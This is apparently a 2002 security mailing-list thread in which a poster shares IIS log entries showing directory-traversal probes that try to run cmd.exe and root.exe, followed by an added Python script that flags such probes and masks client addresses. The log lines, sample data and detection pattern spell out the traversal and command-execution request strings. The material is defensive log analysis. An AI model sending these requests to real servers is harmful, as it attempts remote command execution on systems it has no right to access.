Your best idea when posting to this list is to sanitize the logs. If you feel funny about posting your IP sir, simply take out the address. A quick script with GREP or PERL would suffice. ;)
"Buffer Overflow in /dev/stomach due to vodka.o!"

>From: Jim Grossl <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: IIS log files, can I have your take on these attacks?
>Date: Tue, 15 Jan 2002 09:23:32 -0700
>
>207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
>207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
>207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
>207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
>207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837
>207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
>
>It kind of bothers me to post these on an open list (apparently our Web server
>doesn't need any more "attention") but I would like to know what everyone thinks
>of these attacks. My Web server logged > 2000 of these attacks over the weekend.
>I'm pretty sure that attacks are not succeeding, but I've read that if the "%5c"
>shows up in the Double Decode attack that the file traversal is taking place.
>Thanks.
>
>Jim Grossl
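As an added example (not code from the thread or from either poster), a short Python script that reads entries in the quoted log format, flags the cmd.exe/root.exe traversal probes, separates the 404/401 rejections from any 200 response that deserves a closer look, and masks client addresses before an excerpt is shared, as the reply suggests. The sample entries and the set of traversal encodings it matches are constructed for illustration and are assumptions, not taken from the poster's server.

```python
import re
from collections import Counter

# Constructed sample entries in the format of the quoted log; documentation
# addresses from 192.0.2.0/24 stand in for real client IPs.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
192.0.2.10 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
192.0.2.10 - - [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837
192.0.2.11 - - [14/Jan/2002:11:02:10 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512
192.0.2.12 - - [14/Jan/2002:11:05:00 -0700] "GET /index.html HTTP/1.0" 200 1024
"""

# Common Log Format: host ident authuser [timestamp] "request" status bytes
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$')
# Traversal encodings seen in the quoted log plus their double-encoded forms
# (assumed set), and the two targets every probe in the quoted log asks for.
PROBE = re.compile(r'\.\.(%5c|%2f|%255c|%252f|/|\\)|(?:cmd|root)\.exe', re.I)
IPV4 = re.compile(r'\b\d{1,3}(?:\.\d{1,3}){3}\b')

def parse_line(line):
    """Return the CLF fields as a dict, or None for a line that does not parse."""
    m = CLF.match(line.strip())
    return m.groupdict() if m else None

def classify(rec):
    """None for a benign request; 'failed' when the server rejected the probe
    (401/403/404, as in the quoted entries); 'investigate' on a 200, because
    the request then reached a handler and the response needs a look."""
    if not PROBE.search(rec['path']):
        return None
    return 'investigate' if rec['status'] == '200' else 'failed'

def sanitize(line):
    """Mask client addresses before sharing a log excerpt on a list."""
    return IPV4.sub('x.x.x.x', line)

def summarise(log_text):
    """Count probes per verdict and per source; collect sanitized entries worth a look."""
    verdicts, sources, suspicious = Counter(), Counter(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        verdict = classify(rec) if rec else None
        if verdict is None:
            continue
        verdicts[verdict] += 1
        sources[rec['ip']] += 1
        if verdict == 'investigate':
            suspicious.append(sanitize(line))
    return {'verdicts': dict(verdicts), 'sources': dict(sources), 'suspicious': suspicious}
```

Run `summarise(SAMPLE_LOG)` on the sample: the three rejected probes count as failed, the one 200 is listed under suspicious with its address masked, and the plain page view is ignored.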
